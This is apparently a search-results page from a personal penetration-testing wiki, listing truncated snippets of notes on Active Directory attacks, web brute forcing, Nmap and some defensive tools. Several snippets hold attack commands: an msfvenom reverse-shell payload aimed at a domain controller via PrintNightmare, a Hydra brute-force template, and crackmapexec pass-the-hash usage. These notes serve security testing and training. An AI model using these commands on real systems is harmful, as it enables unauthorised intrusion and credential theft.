Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

100 total results found

Notes & Cheat Sheets

Active Directory

active-directory

Hash Reversing

hashes
hashing
encryption
hash

Web

css
javascript
http
html
www
web

Nmap

networking
nmap

Network Pivoting

networking
lateral-movement
pivoting

File Transfers and Data Exfiltration

data-exfiltration
file-transfer

Field Observations

target-database
field-observations

IT Notes

networking
netadmin
network-administration
sysadmin
systems-administration
IT
information-technology

Kali Optimizations

Post Exploitation: Enumeration

Active Directory

active-directory
post-exploitation

Post Exploitation: Attacks

Active Directory

attack-vectors
post-exploitation
active-directory

FFUF

Web

web
brute-force
ffuf

Hydra

Web

brute-force
hydra
web

Port Forwarding

Network Pivoting

port-forwarding

gobuster

Web

gobuster

Web

Field Observations

web

Automation with Ansible

IT Notes

ansible
automation
information-technology

FleetDM On Debian 11

IT Notes

defend
osquery
fleetdm

Initial Attack Vectors

Active Directory

Internal: --------- Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host. External: --------- Attack vectors that could work in both internal and external ...

active-directory
attack-vectors

Wazuh Notes

IT Notes

A place to keep cheat sheets and configuration guides related to Wazuh that are otherwise too short for a blog post.

defend
siem
wazuh

Proxmox Notes

IT Notes

home-lab
proxmox

LLMNR Poisoning (Internal)

Active Directory Initial Attack Vectors

Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local Area Network (LAN), this attack method cannot be performed from a different subnet. The attacker would have to compromise a host on the LAN and upload tools, or p...

llmnr
internal
llmnr-poisoning

SMB Relay (Internal/External)

Active Directory Initial Attack Vectors

Note: Network Environment This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...

smb
active-directory
external
internal

IPv6 DNS Spoofing (Internal)

Active Directory Initial Attack Vectors

Note: Network Environment This spoofing attack and works by sending a router announcement to multicastff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announc...

ipb6
active-directory
internal

Passback Attacks (Internal/External)

Active Directory Initial Attack Vectors

What's the Flaw? Usually involves an unsecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...

internal
passback
active-directory
external

PowerView

Active Directory Post Exploitation: Enumeration

Overview A set of PowerShell functions that can be used to enumerate ActiveDirectory. Part of the larger PowerSploit Framework Usage Transfer PowerView.ps1 to the compromised target. Requires a PowerShell session. Then, source the file into the current se...

BloodHound

Active Directory Post Exploitation: Enumeration

1. Installation sudo apt install -y neo4j bloodhound   2. Setup sudo neo4j console & Navigate to http://localhost:7474 Login is neo4j and change the default password sudo bloodhound & Log into the neo4j user account with the new password   3. Da...

Manual Enumeration

Active Directory Post Exploitation: Enumeration

Users net.exe Local net user net user <username> Domain net user /domain net user <username> /domain PowerShell Local Get-LocalUser Domain # Can enumerate specific users by changing the search filter $dom = [System.DirectoryServices.Active...

Pass the Password

Active Directory Post Exploitation: Attacks

Overview Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Attack 1: crackmapexec sudo crackmapexec smb <target-or...

Pass the Hash

Active Directory Post Exploitation: Attacks

Overview Dumped the SAM or LSA and now have hashes for domain or a local users. Use the hash and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Anatomy of a Windows Hash username:SID:LM_HASH:NT...

Token Impersonation

Active Directory Post Exploitation: Attacks

Overview Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain unt...

Kerberoasting

Active Directory Post Exploitation: Attacks

Overview The attacker uses a known username and password of a user on a domain. A typical Kerberos workflow is: Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket). Then, they'll use that TGT to request a TGS (ticket-gra...

Group Policy Preferences (GPP)

Active Directory Post Exploitation: Attacks

Overview GPP allows admins to create policies with embedded credentials. The credentials are encrypted and stored in a cPassword. The key was accidentally released. What's the Flaw? The MS14-025 patch does not apply to GPP passwords embedded prior to the ...

PrintNightmare

Active Directory Post Exploitation: Attacks

Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675

PrintNightmare (Internal/External)

Active Directory Initial Attack Vectors

Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell. Create payload msfvenom -p <payload> LHOST=<kali-ip...

print-nightmare
active-directory
external
internal

Mimikatz

Active Directory Post Exploitation: Attacks

Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimkatz is primarily used to dump hashes from  LSASS, pass hashes, or generating Kerberos tickets for use in attacks.     ...

ZeroLogon

Active Directory Post Exploitation: Attacks

Caution This can potentially break a domain controller, due the fact that this attack temporarily removes the password from a domain controller. After testing this attack, the original password should be restored. ZeroLogon Checker https://github.com/Secu...

AES 256 ECB

Hash Reversing

Example from Vulnhub https://www.vulnhub.com/entry/prime-1,358/ In this challenge, a script outputs an AES-256 encrypted file and a hint in key.txt The hint says to hash the word "ippsec" with the MD5 algorithm This is the key to decrypt the hash Hash Base 6...

aes-256-ecb
aes
hash

Use FFUF to Brute Force Login

Web FFUF

Brute Force with a Request File Start Burp Make a randomized login to the target web page Copy the output, for example: POST /login HTTP/1.1 Host: 10.10.10.10 Content-Length: 37 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT ...

Brute Forcing Logins with Hydra

Web Hydra

Example Usage hydra -IVVf [ip-or-hostname] -t [threads] -l [username] -P [password-list] [http-<method>-form] [path-to-login-page:<username-param>=^USER^&<password-param>=^PASS^&<additional-form-param>=[param-value]:<login-error-message>:<session-id> I like ...

Nmap Scanning with Categories

Nmap

Example 1: Nmap script scan with categories Categories https://nmap.org/book/nse-usage.html#nse-categories auth broadcast brute default discovery dos exploit external fuzzer intrusive malware safe version vuln # Scan UDP/161 with all snmp-* scripts # Do ...